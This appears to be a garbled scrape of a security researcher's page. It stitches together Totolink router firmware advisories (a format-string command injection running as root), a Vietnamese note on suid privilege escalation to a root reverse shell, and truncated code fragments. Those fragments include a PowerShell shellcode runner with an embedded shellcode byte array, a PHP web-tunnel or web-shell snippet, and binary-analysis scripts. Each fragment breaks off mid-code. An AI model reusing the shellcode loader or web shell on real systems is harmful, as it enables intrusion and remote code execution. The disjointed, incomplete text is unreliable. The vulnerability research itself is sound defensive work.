Nong Hoang Tu dmknght

Firmware info

Device name: N200RE V5
Build version: V9.3.5u.6437_B20230519 (Update 2023-05-26
Download link: https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/204/ids/36.html
Authentication: Yes (Login as account on firmware's web interface)
Affect: Unknown number of ToTotlink firmware that uses function Validity_check.

Description and Impact

Totolink is using function Validity_check to fix OS command injection vulnerability. An attacker can bypass this filter using character %, exploit the format string at snprintf function to execute OS system commands.

Research info

Firmware

Build version: EN_V9.3.5u.6146_B20201023
Download URL: https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/217/ids/36.html

Description and impact

These vulnerabilities allow attacker executes remote OS command as root. The build version was 2020 so It's possibly attacker can send unauthenticated requests to cgi-bin

Root-cause

Totolink's cgi-bin shares the code with other firmware. While the other firmware was analyzed, reported by researchers (and fixed), this firmware wasn't fixed by Totolink company.

I. Overview

Ứng ụng có một số file có suid bit với owner root. Vì vậy, attacker có thể lợi dụng lỗ hổng trong các file này để leo thang dặc quyền.
Goal: Tạo được reverse shell với quyền root

II. Analysis

1. Cách hoạt động của `runasroot` (công cụ: cutter, ghidra)

Note: cutter (backend là rizin framework) sử dụng bộ framework capstone của anh Anh Quỳnh để phân tích và dịch ngược ra assembly code. Trong khi đó, Ghidra sử dụng bộ từ điển Sleigh riêng. Trong một một số trường hợp, kết quả dịch ngược của cùng 1 binary file khi sử dụng 2 framework này là khác nhau.

runasroot là một file ELF có chứa suid bit và sgid bit

	$rzJEzfsIm = @"
	[DllImport("kernel32.dll")]
	public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
	[DllImport("kernel32.dll")]
	public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
	"@

	$ozmjNQUHYWcWLEB = Add-Type -memberDefinition $rzJEzfsIm -Name "Win32" -namespace Win32Functions -passthru

	[Byte[]] $bwHCjeufl = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0

	<?php
	ini_set("allow_url_fopen", true);
	ini_set("allow_url_include", true);
	ini_set('always_populate_raw_post_data', -1);
	error_reporting(E_ERROR \| E_PARSE);

	if(version_compare(PHP_VERSION,'5.4.0','>='))@http_response_code(200);

	function blv_decode($data) {
	$data_len = strlen($data);

	import rzpipe # Using rizin framework. Replace with r2pipe for radare2
	import json
	import hashlib
	import os


	class BinaryMetadata:
	def __init__(self, path: str):
	self.pipe = rzpipe.open(path)
	self.bin_path = path

	from qiling import Qiling
	from capstone import *
	md = Cs(CS_ARCH_X86, CS_MODE_64)


	def print_asm(ql, address, size):
	# Credits -> https://isc.sans.edu/diary/Qiling+A+true+instrumentable+binary+emulation+framework/27372
	buf = ql.mem.read(address, size)
	for i in md.disasm(buf, address):
	opcode = ' '.join('{:02x}'.format(x) for x in i.bytes)